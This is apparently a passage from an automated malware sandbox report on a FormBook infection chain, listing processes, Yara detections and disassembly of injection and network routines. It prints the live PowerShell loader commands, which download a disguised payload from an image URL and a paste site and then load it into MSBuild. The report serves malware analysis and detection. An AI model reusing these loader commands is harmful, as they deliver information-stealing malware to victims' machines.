HIAKQA7ACQAbQBhAG4AZAB1AGMAYQByACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQA7ACQAbQBhAG4AZAB1AGMAYQByAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAEAAKAAnADAALwBWAEEAZgB6ADUALwByAC8AZQBlAC4AZQB0AHMAYQBwAC8ALwA6AHMAcAB0AHQAaAAnACwAIAAnAHMAeQBtAHAAbwBzAGkAYQByAGMAaABhACcALAAgACcAcwB5AG0AcABvAHMAaQBhAHIAYwBoAGEAJwAsACAAJwBzAHkAbQBwAG8AcwBpAGEAcgBjAGgAYQAnACwAIAAnAE0AUwBCAHUAaQBsAGQAJwAsACAAJwBzAHkAbQBwAG8AcwBpAGEAcgBjAGgAYQAnACwAIAAnAHMAeQBtAHAAbwBzAGkAYQByAGMAaABhACcALAAnAHMAeQBtAHAAbwBzAGkAYQByAGMAaABhACcALAAnAHMAeQBtAHAAbwBzAGkAYQByAGMAaABhACcALAAnAHMAeQBtAHAAbwBzAGkAYQByAGMAaABhACcALAAnAHMAeQBtAHAAbwBzAGkAYQByAGMAaABhACcALAAnAHMAeQBtAHAAbwBzAGkAYQByAGMAaABhACcALAAnADEAJwAsACcAcwB5AG0AcABvAHMAaQBhAHIAYwBoAGEAJwApACkAOwBpAGYAIAAoACQAbgB1AGwAbAAgAC0AbgBlACAAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUAIAAtAGEAbgBkACAAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAWwB2AG8AaQBkAF0AJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAgAH0AIABlAGwAcwBlACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBQAG8AdwBlAHIAUwBoAGUAbABsACAAdgBlAHIAcwBpAG8AbgAgAE4AbwB0ACAAYQB2AGEAaQBsAGEAYgBsAGUAJwAgAH0AOwBpAGYAIAAoACQAbgB1AGwAbAAgAC0AbgBlACAAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUAIAAtAGEAbgBkACAAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAWwB2AG8AaQBkAF0AJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAgAH0AIABlAGwAcwBlACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBQAG8AdwBlAHIAUwBoAGUAbABsACAAdgBlAHIAcwBpAG8AbgAgAE4AbwB0ACAAYQB2AGEAaQBsAGEAYgBsAGUAJwAgAH0AOwA=';$atomismo = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($zooiatrologia));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $atomismo
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:4
                                                                                                            Start time:04:04:58
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:5
                                                                                                            Start time:04:05:00
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64String($bubela);$padrasto = [System.Reflection.Assembly]::Load($adjutor);$manducar = [dnlib.IO.Home].GetMethod('VAI');$manducar.Invoke($null, @('0/VAfz5/r/ee.etsap//:sptth', 'symposiarcha', 'symposiarcha', 'symposiarcha', 'MSBuild', 'symposiarcha', 'symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','1','symposiarcha'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:9
                                                                                                            Start time:04:05:25
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                            Imagebase:0x930000
                                                                                                            File size:262'432 bytes
                                                                                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2570201674.0000000006950000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2184961548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:10
                                                                                                            Start time:04:05:41
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\choice.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\choice.exe"
                                                                                                            Imagebase:0xac0000
                                                                                                            File size:28'160 bytes
                                                                                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2951402841.0000000004770000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2951435333.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:11
                                                                                                            Start time:04:06:08
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                            File size:676'768 bytes
                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:2.3%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:17.4%
                                                                                                              Total number of Nodes:46
                                                                                                              Total number of Limit Nodes:3
                                                                                                              execution_graph 10148 23761c234b7 10149 23761c234d4 10148->10149 10150 23761c2356d 10149->10150 10151 23761c234fb SleepEx 10149->10151 10151->10149 10152 23761c22888 10153 23761c228ae 10152->10153 10154 23761c22927 10153->10154 10155 23761c228f9 CreateThread 10153->10155 10156 23761c2b461 10157 23761c2b464 10156->10157 10158 23761c2b4e5 connect 10157->10158 10159 23761c2b270 10160 23761c2b2a2 10159->10160 10161 23761c2b2f4 socket 10160->10161 10162 2d4f808 10164 2d4f83d 10162->10164 10163 2d4f852 SleepEx 10163->10164 10165 2d4f8a2 NtCreateSection 10163->10165 10164->10163 10166 2d4f87f 10164->10166 10165->10166 10167 2d4f8f9 10165->10167 10167->10166 10168 2d4f918 NtMapViewOfSection 10167->10168 10168->10166 10169 2d4f95d NtMapViewOfSection 10168->10169 10169->10166 10170 2d53b6b 10172 2d53b75 10170->10172 10171 2d53c74 10172->10171 10176 2d5e5f2 10172->10176 10174 2d53c5d 10180 2d4f9c2 10174->10180 10177 2d5e663 10176->10177 10179 2d5e675 10177->10179 10186 2d4f6b2 10177->10186 10179->10174 10182 2d4f9e8 10180->10182 10181 2d4fa22 SleepEx 10181->10182 10185 2d4fa56 10181->10185 10182->10181 10184 2d4fa0d 10182->10184 10183 2d4fa95 NtResumeThread 10183->10184 10184->10171 10185->10183 10185->10184 10188 2d4f6e4 10186->10188 10187 2d4f852 SleepEx 10187->10188 10189 2d4f8a2 NtCreateSection 10187->10189 10188->10187 10190 2d4f87f 10188->10190 10189->10190 10191 2d4f8f9 10189->10191 10190->10179 10191->10190 10192 2d4f918 NtMapViewOfSection 10191->10192 10192->10190 10193 2d4f95d NtMapViewOfSection 10192->10193 10193->10190 10194 23761c2b3b4 10196 23761c2b401 10194->10196 10195 23761c2b435 send 10196->10195

                                                                                                              Executed Functions

                                                                                                              Function 02D4F6B2 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 253COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • SleepEx.KERNEL32(38C7E5F5,000000A3), ref: 02D4F858
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2391021607.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2cd0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID: @$@
                                                                                                              • API String ID: 3472027048-149943524
                                                                                                              • Opcode ID: 6d8da88b7346f02fe20e9cb9dc25188aad902ff77a71fa4c657e6043ba6aa1f6
                                                                                                              • Instruction ID: f57a410ac2805867f7ba244ec3adc048624e1a8d5e2734ff00f44ac1f98909b8
                                                                                                              • Opcode Fuzzy Hash: 6d8da88b7346f02fe20e9cb9dc25188aad902ff77a71fa4c657e6043ba6aa1f6
                                                                                                              • Instruction Fuzzy Hash: B4810471A18B488FD715DF28C88579EBBF1FB49704F10066EE8869B651DB30D946CBC2
                                                                                                              Function 02D4F9BE Relevance: 3.1, APIs: 2, Instructions: 93nativethreadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 30 2d4f9be-2d4f9e1 31 2d4f9e8-2d4fa0b call 2d5c1c2 30->31 32 2d4f9e3 call 2d4bdc2 30->32 35 2d4fa15-2d4fa1c 31->35 36 2d4fa0d-2d4fa13 31->36 32->31 38 2d4fa22-2d4fa2c SleepEx 35->38 37 2d4fa42-2d4fa55 36->37 39 2d4fa56-2d4fa5e 38->39 40 2d4fa2e-2d4fa33 38->40 41 2d4fa95-2d4faa2 NtResumeThread 39->41 42 2d4fa60-2d4fa93 call 2d4be62 call 2d5c1c2 39->42 40->38 43 2d4fa35-2d4fa3b 40->43 41->43 45 2d4faa4-2d4faaf 41->45 42->41 42->43 46 2d4fa3d-2d4fa3e 43->46 45->46 46->37
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2391021607.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2cd0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeSleepThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 1530989685-0
                                                                                                              • Opcode ID: 6b54275e8c1a73e1592ae6dc2e07807a4dee123f5e3800549bbfcaa29b564534
                                                                                                              • Instruction ID: cf3a061407c47cc844095ce202102b55a1e13cd5d68d5e2afbeb081d805701a9
                                                                                                              • Opcode Fuzzy Hash: 6b54275e8c1a73e1592ae6dc2e07807a4dee123f5e3800549bbfcaa29b564534
                                                                                                              • Instruction Fuzzy Hash: B321923061C74E8FDB68DF6894897AAB7E1FB54314F40062AD89AC77A1EF70C9428B41
                                                                                                              Function 0000023761C22761 Relevance: 1.7, APIs: 1, Instructions: 162COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2399010828.0000023761BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000023761BF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_23761bf0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c6dd29ad9aacdc2860fb49854d899649d772ecc0fcfcd065333c638bb3e9719e
                                                                                                              • Instruction ID: 81fe9b02806e3c3751931daa4d6fbdba838afe80cebf5dac1f679f56a439d465
                                                                                                              • Opcode Fuzzy Hash: c6dd29ad9aacdc2860fb49854d899649d772ecc0fcfcd065333c638bb3e9719e
                                                                                                              • Instruction Fuzzy Hash: 85516C7251CB854FEB269A38D4AB3E9BBE4FB49310F0405ADD496CB193DB2AC543CB41
                                                                                                              Function 02D4F74D Relevance: 1.7, APIs: 1, Instructions: 156COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 83 2d4f74d-2d4f74e 84 2d4f6d0-2d4f6e2 83->84 85 2d4f750-2d4f773 83->85 94 2d4f6e4-2d4f6e5 84->94 95 2d4f6ff-2d4f716 84->95 86 2d4f776 85->86 87 2d4f780-2d4f7ab 85->87 88 2d4f778-2d4f77f 86->88 89 2d4f7b3 87->89 90 2d4f7ad-2d4f7b1 87->90 92 2d4f781-2d4f7a2 88->92 93 2d4f7e2-2d4f84f 88->93 96 2d4f7b4-2d4f7bc 89->96 97 2d4f7be-2d4f7c2 89->97 90->89 98 2d4f7a4-2d4f7ab 92->98 105 2d4f852-2d4f85e SleepEx 93->105 101 2d4f6ea-2d4f6fe 94->101 95->101 102 2d4f718-2d4f74b 95->102 96->97 97->98 99 2d4f7c4-2d4f7e0 97->99 98->89 98->90 99->93 101->95 102->88 106 2d4f860-2d4f864 105->106 107 2d4f8a2-2d4f8f7 NtCreateSection 105->107 108 2d4f866-2d4f873 call 2d5cbd2 106->108 109 2d4f878-2d4f87d 106->109 110 2d4f87f-2d4f886 107->110 111 2d4f8f9-2d4f912 107->111 108->109 109->105 109->110 113 2d4f888-2d4f8a1 110->113 111->110 115 2d4f918-2d4f957 NtMapViewOfSection 111->115 115->110 116 2d4f95d-2d4f99b NtMapViewOfSection 115->116 116->110 117 2d4f9a1-2d4f9b9 116->117 117->113
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2391021607.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2cd0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f63af62f1751b0b519fcbc299e089d5a1f9f81eaae433f90fe2cb0afb1a0a3a2
                                                                                                              • Instruction ID: ab0b121f00921d481e92cfaab8bc94c2c1e06b58a562e0f1a14baebf3576005e
                                                                                                              • Opcode Fuzzy Hash: f63af62f1751b0b519fcbc299e089d5a1f9f81eaae433f90fe2cb0afb1a0a3a2
                                                                                                              • Instruction Fuzzy Hash: 9841AF72A146998FC716CF7894846D8BBE1EF46324B1403EEC8919FB52EB214C47CBD1
                                                                                                              Function 0000023761C234B7 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2399010828.0000023761BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000023761BF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_23761bf0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 3472027048-0
                                                                                                              • Opcode ID: e5d5344516f46b3e81ea50842ef477338357dbc782aafa192d6f0a2f948ed59a
                                                                                                              • Instruction ID: 5fea881eb6b136b67925bb8aa38c40ada72cd9d10664d951ea02be70cab22958
                                                                                                              • Opcode Fuzzy Hash: e5d5344516f46b3e81ea50842ef477338357dbc782aafa192d6f0a2f948ed59a
                                                                                                              • Instruction Fuzzy Hash: 2D2184B491CE184FEF76EB2884AF7AC76D4F749700F4415FAD54AC7187CB284A434A41
                                                                                                              Function 0000023761C2B461 Relevance: 1.6, APIs: 1, Instructions: 70networkCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 141 23761c2b461-23761c2b462 142 23761c2b475 141->142 143 23761c2b464 141->143 146 23761c2b477-23761c2b48e 142->146 147 23761c2b48f-23761c2b4b9 call 23761c27fc8 142->147 144 23761c2b4dc-23761c2b4df 143->144 145 23761c2b466-23761c2b474 143->145 149 23761c2b4e5-23761c2b508 connect 144->149 145->142 146->147 147->149 151 23761c2b4bb-23761c2b4d9 call 23761c2e6f8 147->151 151->144
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2399010828.0000023761BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000023761BF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_23761bf0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: connect
                                                                                                              • String ID:
                                                                                                              • API String ID: 1959786783-0
                                                                                                              • Opcode ID: e29e028722582de79358f5980929e9c38a26178390aea9578061670c9bd084c5
                                                                                                              • Instruction ID: 8f9b13825dbf2a52a6e4a3a427efaaf73ed2f5304cc5983a530c8a33dac68e1e
                                                                                                              • Opcode Fuzzy Hash: e29e028722582de79358f5980929e9c38a26178390aea9578061670c9bd084c5
                                                                                                              • Instruction Fuzzy Hash: AF218E7090CB448FDF58EF18908EB5D77E0FB68300F1441AEE84DCB28BDA3485458B55
                                                                                                              Function 0000023761C2B3B4 Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 153 23761c2b3b4-23761c2b409 call 23761c27f38 156 23761c2b40b-23761c2b42f call 23761c2e6f8 153->156 157 23761c2b435-23761c2b460 send 153->157 156->157
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2399010828.0000023761BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000023761BF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_23761bf0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: send
                                                                                                              • String ID:
                                                                                                              • API String ID: 2809346765-0
                                                                                                              • Opcode ID: ba031a3d4cf1e373f283f661f470c724b29e80ce24db05dc12c25fbb2c07280e
                                                                                                              • Instruction ID: d9cb3d318a4c9789340faf94482e409ad91ebe0b713e2ef02b0d1f476b4adfaa
                                                                                                              • Opcode Fuzzy Hash: ba031a3d4cf1e373f283f661f470c724b29e80ce24db05dc12c25fbb2c07280e
                                                                                                              • Instruction Fuzzy Hash: 5D116D7091CB488FDB58EF18908D75977E1FB98300F0405BEE84DC728ADE3489458B96
                                                                                                              Function 02D4F7E7 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 160 2d4f7e7-2d4f7f3 161 2d4f7f5-2d4f800 160->161 162 2d4f7cb 160->162 165 2d4f84a-2d4f84f 161->165 163 2d4f7dd-2d4f7e5 162->163 164 2d4f7cd-2d4f7db 162->164 163->165 164->163 170 2d4f852-2d4f85e SleepEx 165->170 171 2d4f860-2d4f864 170->171 172 2d4f8a2-2d4f8f7 NtCreateSection 170->172 173 2d4f866-2d4f873 call 2d5cbd2 171->173 174 2d4f878-2d4f87d 171->174 175 2d4f87f-2d4f886 172->175 176 2d4f8f9-2d4f912 172->176 173->174 174->170 174->175 178 2d4f888-2d4f8a1 175->178 176->175 180 2d4f918-2d4f957 NtMapViewOfSection 176->180 180->175 181 2d4f95d-2d4f99b NtMapViewOfSection 180->181 181->175 182 2d4f9a1-2d4f9b9 181->182 182->178
                                                                                                              APIs
                                                                                                              • SleepEx.KERNEL32(38C7E5F5,000000A3), ref: 02D4F858
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2391021607.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2cd0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 3472027048-0
                                                                                                              • Opcode ID: 10e1e9b701606f0124b0771689eefceb40515bdf1aaf5f9278386f980045e2bb
                                                                                                              • Instruction ID: 979c7cc5824ee70419f64e35a1c6f7dcaa25d63a0c80ed52bcf91b5fb398c01a
                                                                                                              • Opcode Fuzzy Hash: 10e1e9b701606f0124b0771689eefceb40515bdf1aaf5f9278386f980045e2bb
                                                                                                              • Instruction Fuzzy Hash: 75119C735087888FD7179F28D8813F9BBA1FB86318F60016EC0814AD65DB21D867C7C6
                                                                                                              Function 0000023761C2B270 Relevance: 1.6, APIs: 1, Instructions: 65networkCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2399010828.0000023761BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000023761BF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_23761bf0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: socket
                                                                                                              • String ID:
                                                                                                              • API String ID: 98920635-0
                                                                                                              • Opcode ID: fe0b27142001355644bb426f277d774d6a2c174b7954e7e7cc7144a6952ac7b8
                                                                                                              • Instruction ID: e3d127754e73e3c8e960b67cb4534a4221bcd486cc755183ce20eb98d9e0c12d
                                                                                                              • Opcode Fuzzy Hash: fe0b27142001355644bb426f277d774d6a2c174b7954e7e7cc7144a6952ac7b8
                                                                                                              • Instruction Fuzzy Hash: 69114F7091CB448FDB54EF18908A65AB7E1FB58300F0401BEE84DC724ADB7485458B95
                                                                                                              Function 02D4F808 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 191 2d4f808-2d4f83b 192 2d4f84d-2d4f84f 191->192 193 2d4f83d-2d4f84b 191->193 196 2d4f852-2d4f85e SleepEx 192->196 193->192 197 2d4f860-2d4f864 196->197 198 2d4f8a2-2d4f8f7 NtCreateSection 196->198 199 2d4f866-2d4f873 call 2d5cbd2 197->199 200 2d4f878-2d4f87d 197->200 201 2d4f87f-2d4f886 198->201 202 2d4f8f9-2d4f912 198->202 199->200 200->196 200->201 204 2d4f888-2d4f8a1 201->204 202->201 206 2d4f918-2d4f957 NtMapViewOfSection 202->206 206->201 207 2d4f95d-2d4f99b NtMapViewOfSection 206->207 207->201 208 2d4f9a1-2d4f9b9 207->208 208->204
                                                                                                              APIs
                                                                                                              • SleepEx.KERNEL32(38C7E5F5,000000A3), ref: 02D4F858
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2391021607.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2cd0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 3472027048-0
                                                                                                              • Opcode ID: 26b8d342742a942f3f10fee080c542171953fc59148f4b2c17e22cca1539cb05
                                                                                                              • Instruction ID: d90e74cd7301d41d652095460b3078b651771d22051af125516fdb872ad9b21f
                                                                                                              • Opcode Fuzzy Hash: 26b8d342742a942f3f10fee080c542171953fc59148f4b2c17e22cca1539cb05
                                                                                                              • Instruction Fuzzy Hash: BE116B329287588FDB2A9F24D8823F9BBA5FB45320F30069DC1C49B661EF369447C785
                                                                                                              Function 0000023761C2287E Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2399010828.0000023761BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000023761BF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_23761bf0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2422867632-0
                                                                                                              • Opcode ID: 8753b0ec0e1895fe7b64e0b8d5929eea9c437e27af0331dd583a33202b4251b6
                                                                                                              • Instruction ID: 253c756d4a55c75cee7e62c41971d389118f38a3924d068aa02cef41a890cd78
                                                                                                              • Opcode Fuzzy Hash: 8753b0ec0e1895fe7b64e0b8d5929eea9c437e27af0331dd583a33202b4251b6
                                                                                                              • Instruction Fuzzy Hash: 9111A070528A484BFB65AF38C4AF39AB3E5FB48304F040569D415CA295DB7985438F51
                                                                                                              Function 0000023761C22888 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2399010828.0000023761BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000023761BF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_23761bf0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2422867632-0
                                                                                                              • Opcode ID: 1e4df429d26f78e91e6556a3025b62049a28ce1a09f8d99d8591f285986e6a9c
                                                                                                              • Instruction ID: 357d52887e72408582e918115cf40d3d796493f733396cc656c98817965d0f43
                                                                                                              • Opcode Fuzzy Hash: 1e4df429d26f78e91e6556a3025b62049a28ce1a09f8d99d8591f285986e6a9c
